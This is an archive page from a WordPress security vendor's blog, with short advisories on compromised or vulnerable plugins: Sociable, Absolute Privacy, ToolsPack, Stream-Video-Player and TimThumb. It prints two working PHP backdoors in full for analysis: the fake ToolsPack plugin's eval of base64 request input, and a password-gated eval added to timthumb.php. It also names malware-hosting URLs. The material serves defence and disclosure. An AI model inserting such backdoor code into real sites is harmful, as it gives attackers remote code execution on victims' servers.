If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.
Sociable WordPress Plugin Security Warning
September 7, 2012 by 7 Comments
If you are using the Sociable WordPress Plugin (plugin with 1,777,161 downloads), be very careful when visiting the plugin’s page settings. We recommend that you disable it or remove it for now, at least until it gets fixed.
A customer alerted us to the issue, when you visit the settings page (e.g., site.com/wp-admin/options-general.php?page=sociable_select) you get a malware warning from Google (this site may harm your computer).
What is going on?
The issue is that the plugin is loading an image from a site that is currently compromised (inside this file: includes/class-sociable_Admin_Options.php):
http://balon24.com.ar/wp-content/plugins/sociable/images/Fueto_Sociable.png
That causes the browser to redirect to http://commitse.ru/ (known malware site). This is what happens when you load that image:
$ curl -D – -A “” http://balon24.com.ar/wp-content/plugins/sociable/images/Fueto_Sociable.png
HTTP/1.1 302 Found
Date: Fri, 07 Sep 2012 21:02:59 GMT
Server: Apache
Location: httx://commitse .ru
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
There are some discussions on the WordPress forums about it here: http://wordpress.org/support/topic/plugin-sociable-image-causing-malware-detected-flags, but in the mean time, we recommend users delete or disable the plugin.
It doesn’t look like the plugin was compromised, just an external image was used and the site housing that image is currently compromised.
We will post more details when we have it.
Official WordPress Plugin Directory – Forcing Plugin Updates
May 11, 2012 by 5 Comments
For some while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is updates were forced – certainly for the major vulnerabilities.
In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.
Read More
Sucuri WordPress Security Plugin Protects Against PHP-CGI Vulnerability
May 8, 2012 by 4 Comments
Today we released an update on the latest PHP CGI vulnerability and provided some additional information that users can use to help protect against it.
Guidance includes updating your .htaccess file with the following:
RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? – [F,L]
It is important to note however that if you are on WordPress and currently using our Free security plugin you are protected. We are actively seeing the attack across our growing network of plugin users and proactively pushing changes to protect our users.
Read More
Sucuri Security WordPress Plugin Free To Clients: Getting Proactive with Web Malware
April 25, 2012 by 2 Comments
We are happy to announce that our premium WordPress plugin is now for free to all our existing and new clients. The plugin is a great compliment to our malware scanning and remediation services and provides a large array of features designed to help you combat the growing web malware problem.
Note: the plugin is available under all our existing plans for all our users.
We have started to get questions that ask whether this is the only plugin required for all your security needs, the answer is “no”. It is meant to compliment your arsenal and help you become more proactive when it comes to securing your WordPress instance.
Vulnerability in the Absolute Privacy Plugin
February 23, 2012 by 4 Comments
We are seeing reports that a vulnerability in the Absolute Privacy WordPress plugin (link) is being used to hack and compromise sites with it installed.
This plugin has a serious unpatched security vulnerability that allows anyone to login in the WordPress site without a password. From Secunia:
Schaffnern has discovered a vulnerability in the Absolute Privacy plugin for WordPress, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to an error within the “abpr_authenticateUser()” function in wp-content/plugins/absolute-privacy/functions.php, which prevents the password from being verified. This can be exploited to bypass the authentication mechanism and gain administrative access to the application.
The vulnerability is confirmed in version 2.0.5. Other versions may also be affected.
Note that this plugin has had more than 35 thousand downloads and no patches for this bug. We recommend deleting this plugin asap until a fix is in place.
Our team is still analysing this vulnerability and we will post more details soon. Additional information and original report was found here.
If you think your site has been compromised, you can verify it in here: http://sitecheck.sucuri.net
New WordPress ToolsPack Plugin
February 14, 2012 by 37 Comments
We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.
They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”
Interesting…
However, when we look at the plugin code, all it does is this:
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>
If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!
How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.
Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.
Have you seen this plugin, or something like it? make sure to leave a comment with your experience.
Site is hacked? Not sure? Check here http://sitecheck.sucuri.net
Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin
December 27, 2011 by 5 Comments
If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.
The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.
Read More
TimThumb.php backdoor
September 14, 2011 by Leave a Comment
If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.
We are seeing in many sites the timthumb.php with the following code added to it:
if (md5 (md5($_POST['p']))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST['c'])));
If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.
For more details on the timthumb.php vulnerability, check our multiple posts about it: here. For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?
TimThumb.php Vulnerability Not Only Affecting Themes – Plugins too
August 16, 2011 by 4 Comments
The Timthumb.php vulnerability is being used in the wild to hack and infect thousands of WordPress sites.
Hopefully everyone is checking their themes and updating the script to make sure it is not vulnerable. This is wishful thinking.
Unfortunately, the issue is not limited to themes alone. There are some plugins that include the TimThumb.php script, and you need to check and update them as well (if you are not sure how to do so, check out this post, we’ve include a script to automate it for you).
Read More
Comments